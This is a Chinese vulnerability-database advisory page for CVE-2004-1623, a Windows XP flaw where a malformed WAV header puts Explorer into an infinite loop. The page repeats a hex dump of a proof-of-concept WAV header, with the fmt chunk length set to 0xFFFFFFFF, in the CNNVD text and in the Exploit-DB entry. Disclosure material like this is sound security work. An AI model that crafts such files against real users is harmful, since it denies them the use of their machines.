CVE-2004-1623
CVSS5.0
发布时间 :2004-10-22 00:00:00
修订时间 :2016-10-17 22:57:52
NMCOE    

[原文]The WAV file property handler in Windows XP SP1 allows remote attackers to cause a denial of service (infinite loop in Explorer) via a WAV file with an invalid file header whose fmt chunk length is set to 0xFFFFFFFF.


[CNNVD]Microsoft Windows XP WAV文件处理拒绝服务漏洞(CNNVD-200410-089)

        
        Microsoft Windows XP是一款流行的视窗操作系统。
        Microsoft Windows XP在处理WAV时存在安全问题,远程攻击者可以利用这个漏洞构建恶意WAV文件,诱使用户访问,造成系统崩溃。
        HexView报告构建特殊的WAV文件可使WAV文件处理器进入无限循环,当目标用户通过资源管理器打开SAV文件时消耗所有CPU资源,类似的WAV文件头可构建如下:
        00000000 52 49 46 46 42 D0 01 00 57 41 56 45 66 6D 74 20 RIFFB...WAVEfmt
        00000010 FF FF FF FF 01 00 02 00 22 56 00 00 88 58 01 00 .........V...X..
        00000020 04 00 10 00 00 00 66 61 63 74 04 00 00 00 04 74 ......fact.....t
        00000030 00 00 64 61 74 61 10 D0 01 00 ..data....
        其中'fmt'块设置为 0xFFFFFFFF (offset 0x10)代替通常的0x12字节长度。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp::sp1:media_centerMicrosoft windows xp_sp1 media_center
cpe:/o:microsoft:windows_xp:::embedded
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_xp::sp1:embeddedMicrosoft windows xp_sp1 embedded
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_xp:::media_center

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1623
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1623
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-089
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109846319313443&w=2
(UNKNOWN)  BUGTRAQ  20041021 [HV-LOW] Unsafe WAV header handling can cause DoS on Windows
http://securitytracker.com/id?1011880
(UNKNOWN)  SECTRACK  1011880
http://www.hexview.com/docs/20041021-1.txt
(VENDOR_ADVISORY)  MISC  http://www.hexview.com/docs/20041021-1.txt
http://www.securityfocus.com/bid/11503
(VENDOR_ADVISORY)  BID  11503
http://xforce.iss.net/xforce/xfdb/17864
(UNKNOWN)  XF  windowsxp-explorer-wav-dos(17864)

- 漏洞信息

Microsoft Windows XP WAV文件处理拒绝服务漏洞
中危 其他
2004-10-22 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Windows XP是一款流行的视窗操作系统。
        Microsoft Windows XP在处理WAV时存在安全问题,远程攻击者可以利用这个漏洞构建恶意WAV文件,诱使用户访问,造成系统崩溃。
        HexView报告构建特殊的WAV文件可使WAV文件处理器进入无限循环,当目标用户通过资源管理器打开SAV文件时消耗所有CPU资源,类似的WAV文件头可构建如下:
        00000000 52 49 46 46 42 D0 01 00 57 41 56 45 66 6D 74 20 RIFFB...WAVEfmt
        00000010 FF FF FF FF 01 00 02 00 22 56 00 00 88 58 01 00 .........V...X..
        00000020 04 00 10 00 00 00 66 61 63 74 04 00 00 00 04 74 ......fact.....t
        00000030 00 00 64 61 74 61 10 D0 01 00 ..data....
        其中'fmt'块设置为 0xFFFFFFFF (offset 0x10)代替通常的0x12字节长度。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/technet/security/

- 漏洞信息 (24699)

Microsoft Windows XP WAV File Handler Denial Of Service Vulnerability (EDBID:24699)
windows dos
2004-10-22 Verified
0 HexView
N/A [点击下载]
source: http://www.securityfocus.com/bid/11503/info

Microsoft Windows XP is reported prone to a denial of service vulnerability. The issue exists due to a lack of sufficient sanitization performed on WAV file header values before they are processed. 

If an exploit attempt is successful, the Windows Explorer process will begin to consume CPU resources. An attacker may exploit this vulnerability to deny service to legitimate users.

00000000 52 49 46 46 42 D0 01 00 57 41 56 45 66 6D 74 20 RIFFB...WAVEfmt
00000010 FF FF FF FF 01 00 02 00 22 56 00 00 88 58 01 00 .........V...X..
00000020 04 00 10 00 00 00 66 61 63 74 04 00 00 00 04 74 ......fact.....t
00000030 00 00 64 61 74 61 10 D0 01 00 ..data....		

- 漏洞信息

11053
Microsoft Windows XP Explorer WAV Parsing DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Windows Media Player contains a flaw that may allow a malicious user to consume all the CPU resources of the target machine. The issue is triggered when a malformed .wav file is parsed by the vulnerable system. This results in an infinte loop while the parser tries to read the file forever, resulting in a loss of availability.

- 时间线

2004-10-21 Unknow
2004-10-21 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站